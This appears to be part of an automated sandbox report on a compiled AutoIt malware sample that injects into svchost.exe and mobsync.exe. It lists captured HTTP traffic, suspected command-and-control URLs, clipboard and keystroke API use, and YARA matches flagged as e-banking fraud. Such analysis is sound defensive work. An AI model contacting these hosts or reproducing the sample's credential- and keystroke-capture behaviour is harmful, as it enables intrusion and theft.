64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Connection: closeDate: Sat, 11 Jan 2025 00:40:56 GMTContent-Length: 910X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Download-Options: noopenX-XSS-Protection: 1; mode=blockCache-Flow: 2583346554Origin-Agent-Cluster: ?0FAI-W-FLOW: 2025038038FAI-W-AGENT-AID: 32663896Service-Lane: e8594f12d42b28ee5775cc58b9d2e933P3P: CP=CAO PSA OURX-Permitted-Cross-Domain-Policies: noneServer: F-WEBData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 20 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 22 3e 34 30 34 3a 20 e6 82 a8 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 e3 80 82 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 42 75 74 74 6f 6e 22 3e 0a 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 27 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" hr
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:41:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:41:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:41:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:41:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: mobsync.exe, 00000005.00000002.3897126671.0000000005896000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a
                Source: mobsync.exe, 00000005.00000002.3898565622.0000000007D70000.00000004.00000800.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002F9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW
                Source: mobsync.exe, 00000005.00000002.3897126671.0000000005704000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002E024000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002E08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwR
                Source: ldZEVEbpOrO.exe, 00000006.00000002.3898070817.0000000004BA9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zkdamdjj.shop
                Source: ldZEVEbpOrO.exe, 00000006.00000002.3898070817.0000000004BA9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zkdamdjj.shop/kf1m/
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mobsync.exe, 00000005.00000002.3898565622.0000000007D70000.00000004.00000800.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000003450000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033S
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033a
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: mobsync.exe, 00000005.00000003.2491113129.00000000080AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00704164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00704164
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00704164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00704164
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00703F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00703F66
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_006F001C
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_0071CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0071CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: This is a third-party compiled AutoIt script.0_2_00693B3A
                Source: tfWjjV1LdT.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: tfWjjV1LdT.exe, 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6942c1c0-c
                Source: tfWjjV1LdT.exe, 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_246c2bf9-e
                Source: tfWjjV1LdT.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a5dc350d-7
                Source: tfWjjV1LdT.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_2eaa6f85-a
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C483 NtClose,2_2_0042C483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
